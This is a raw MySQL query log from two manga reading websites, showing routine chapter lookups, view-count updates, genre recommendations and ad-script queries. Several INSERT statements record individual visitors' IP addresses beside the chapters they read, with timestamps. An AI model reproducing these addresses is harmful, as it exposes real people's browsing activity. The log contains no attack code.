mangauser@localhost on u317079482_mangaberri_1 using Socket 330643134 Quit 330643135 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6892' and m.active = 1 330643135 Quit 330643136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643136 Query select * FROM chapters where id = '6892' 330643136 Quit 330643137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643137 Query select * FROM chapters where manga_id = '175' order by display_priority ASC, id desc 330643137 Quit 330643138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643138 Query Update chapters set view=view+1 where id = '6892' 330643138 Quit 330643139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643139 Query select * FROM chapters where id = '6892' 330643139 Quit 330643140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643140 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6892' and m.active = 1 330643140 Quit 330643141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643141 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('175', '6892', '85.190.233.28', 'mangaberri.com', '2026-02-26 03:28:17', '2026-02-26 03:28:17') 330643141 Quit 330643142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643142 Query select * FROM chapter_images where chapter_id = '6892' 330643142 Quit 330643143 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643143 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '175' and m.active = 1 330643143 Quit 330643144 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643144 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='175' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Ecchi%' OR genres like '%Fantasy%' OR genres like '%Horror%' OR genres like '%Mystery%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330643144 Quit 330643145 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643146 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643145 Quit 330643146 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643146 Quit 330643147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643147 Quit 330643148 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643148 Quit 330643149 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643149 Quit 330643150 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643150 Quit 330643151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643151 Quit 330643152 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643152 Quit 330643153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643153 Quit 330643154 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1544' and m.active = 1 330643154 Quit 330643155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643155 Query select * FROM chapters where id = '1544' 330643155 Quit 330643156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643156 Query select * FROM chapters where manga_id = '96' order by display_priority ASC, id desc 330643156 Quit 330643157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643157 Query Update chapters set view=view+1 where id = '1544' 330643157 Quit 330643158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643158 Query select * FROM chapters where id = '1544' 330643159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643158 Quit 330643159 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1544' and m.active = 1 330643159 Quit 330643160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643160 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('96', '1544', '109.57.35.133', 'mangaberri.com', '2026-02-26 03:28:17', '2026-02-26 03:28:17') 330643160 Quit 330643161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643161 Query select * FROM chapter_images where chapter_id = '1544' 330643161 Quit 330643162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643162 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '96' and m.active = 1 330643162 Quit 330643163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643163 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='96' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330643163 Quit 330643164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643164 Quit 330643165 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643165 Quit 330643166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643166 Quit 330643167 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643167 Quit 330643168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643168 Quit 330643169 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643169 Quit 330643170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643170 Quit 330643171 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643171 Quit 260225 19:28:19 330643172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643172 Quit 330643173 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8328' 330643173 Quit 330643174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643174 Query select * FROM chapters where id = '8328' 330643174 Quit 330643175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643175 Query select * FROM chapters where manga_id = '193' order by id desc 330643175 Quit 330643176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643176 Query Update chapters set view=view+1 where id = '8328' 330643176 Quit 330643177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643177 Query select * FROM chapters where id = '8328' 330643178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643178 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8328' 330643177 Quit 330643178 Quit 330643179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643179 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '8328', '104.28.156.137', '2026-02-26 03:28:19', '2026-02-26 03:28:19') 330643179 Quit 330643180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643180 Query select * FROM chapter_images where chapter_id = '8328' 330643180 Quit 330643181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643181 Quit 330643182 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330643182 Quit 330643183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643183 Query select * FROM chapters where manga_id = '193' order by id desc 330643183 Quit 330643184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643184 Quit 330643185 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643185 Quit 330643186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643186 Quit 330643187 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6601' 330643188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643187 Quit 330643188 Query select * FROM chapters where id = '6601' 330643188 Quit 330643189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643189 Query select * FROM chapters where manga_id = '127' order by id desc 330643189 Quit 330643190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643190 Query Update chapters set view=view+1 where id = '6601' 330643190 Quit 330643191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643191 Query select * FROM chapters where id = '6601' 330643192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643191 Quit 330643192 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6601' 330643192 Quit 330643193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643193 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '6601', '5.45.134.144', 'mangacherri.com', '2026-02-26 03:28:19', '2026-02-26 03:28:19') 330643193 Quit 330643194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643194 Query select * FROM chapter_images where chapter_id = '6601' 330643194 Quit 330643195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643195 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330643195 Quit 330643196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643196 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330643197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643198 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '63' and m.active = 1 330643197 Quit 330643198 Quit 330643199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643199 Query select * FROM chapters where id = '63' 330643199 Quit 330643200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643200 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330643200 Quit 330643201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643201 Query Update chapters set view=view+1 where id = '63' 330643201 Quit 330643202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643202 Query select * FROM chapters where id = '63' 330643203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643202 Quit 330643203 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '63' and m.active = 1 330643203 Quit 330643204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643204 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '63', '15.235.27.72', 'mangaberri.com', '2026-02-26 03:28:19', '2026-02-26 03:28:19') 330643204 Quit 330643205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643205 Query select * FROM chapter_images where chapter_id = '63' 330643205 Quit 330643206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643206 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330643206 Quit 330643207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643207 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330643207 Quit 330643208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643208 Quit 330643209 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643209 Quit 330643210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643210 Quit 330643211 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643211 Quit 330643212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643212 Quit 330643213 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643213 Quit 330643214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643214 Quit 330643215 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643215 Quit 330643196 Quit 330643216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643217 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643216 Quit 330643217 Quit 330643218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643218 Quit 330643219 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643219 Quit 330643220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643220 Quit 330643221 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643221 Quit 330643222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643222 Quit 330643223 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643223 Quit 260225 19:28:21 330643224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643224 Quit 330643225 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15047' 330643225 Quit 330643226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643226 Query select * FROM chapters where id = '15047' 330643226 Quit 330643227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643227 Query select * FROM chapters where manga_id = '252' order by id desc 330643227 Quit 330643228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643228 Query Update chapters set view=view+1 where id = '15047' 330643228 Quit 330643229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643229 Query select * FROM chapters where id = '15047' 330643229 Quit 330643230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643230 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15047' 330643231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643231 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('252', '15047', '2001:4860:7:110e::37', 'mangacherri.com', '2026-02-26 03:28:21', '2026-02-26 03:28:21') 330643230 Quit 330643231 Quit 330643232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643232 Query select * FROM chapter_images where chapter_id = '15047' 330643232 Quit 330643233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643233 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '252' and m.active = 1 330643234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643234 Quit 330643235 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643235 Quit 330643233 Quit 330643236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643236 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='252' and m.active = 1 AND (genres like '%Manhwa%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330643236 Quit 330643237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643237 Quit 330643238 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643238 Quit 330643239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643239 Quit 330643240 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643240 Quit 330643241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643241 Quit 330643242 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643242 Quit 330643243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643243 Quit 330643244 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643244 Quit 260225 19:28:22 330643245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643245 Quit 330643246 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '377' and m.active = 1 330643246 Quit 330643247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643247 Query select * FROM chapters where id = '377' 330643247 Quit 330643248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643248 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330643248 Quit 330643249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643249 Query Update chapters set view=view+1 where id = '377' 330643249 Quit 330643250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643250 Query select * FROM chapters where id = '377' 330643250 Quit 330643251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643251 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '377' and m.active = 1 330643251 Quit 330643252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643252 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '377', '31.15.227.126', 'mangaberri.com', '2026-02-26 03:28:22', '2026-02-26 03:28:22') 330643252 Quit 330643253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643253 Query select * FROM chapter_images where chapter_id = '377' 330643253 Quit 330643254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643254 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330643254 Quit 330643255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643255 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330643255 Quit 330643256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643256 Quit 330643257 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643257 Quit 330643258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643258 Quit 330643259 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643259 Quit 330643260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643260 Quit 330643261 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643261 Quit 330643262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643262 Quit 330643263 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643263 Quit 330643264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643264 Quit 330643265 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12465' 330643265 Quit 330643266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643266 Query select * FROM chapters where id = '12465' 330643266 Quit 330643267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643267 Query select * FROM chapters where manga_id = '239' order by id desc 330643267 Quit 330643268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643268 Query Update chapters set view=view+1 where id = '12465' 330643268 Quit 330643269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643269 Query select * FROM chapters where id = '12465' 330643270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643269 Quit 330643270 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12465' 330643270 Quit 330643271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643271 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12465', '2001:550:9801:671e:3921:2f2d:2800:604c', 'mangacherri.com', '2026-02-26 03:28:22', '2026-02-26 03:28:22') 330643271 Quit 330643272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643272 Query select * FROM chapter_images where chapter_id = '12465' 330643272 Quit 330643273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643273 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330643273 Quit 330643274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643274 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:28:23 330643274 Quit 330643275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643275 Quit 330643276 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643276 Quit 330643277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643277 Quit 330643278 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643278 Quit 330643279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643279 Quit 330643280 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643280 Quit 330643281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643281 Quit 330643282 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643282 Quit 330643283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643283 Quit 330643284 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4610' and m.active = 1 330643284 Quit 330643285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643285 Query select * FROM chapters where id = '4610' 330643285 Quit 330643286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643286 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330643286 Quit 330643287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643287 Query Update chapters set view=view+1 where id = '4610' 330643287 Quit 330643288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643288 Query select * FROM chapters where id = '4610' 330643289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643289 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4610' and m.active = 1 330643288 Quit 330643289 Quit 330643290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643290 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4610', '152.22.70.26', 'mangaberri.com', '2026-02-26 03:28:23', '2026-02-26 03:28:23') 330643290 Quit 330643291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643291 Query select * FROM chapter_images where chapter_id = '4610' 330643291 Quit 330643292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643292 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330643292 Quit 330643293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643293 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like 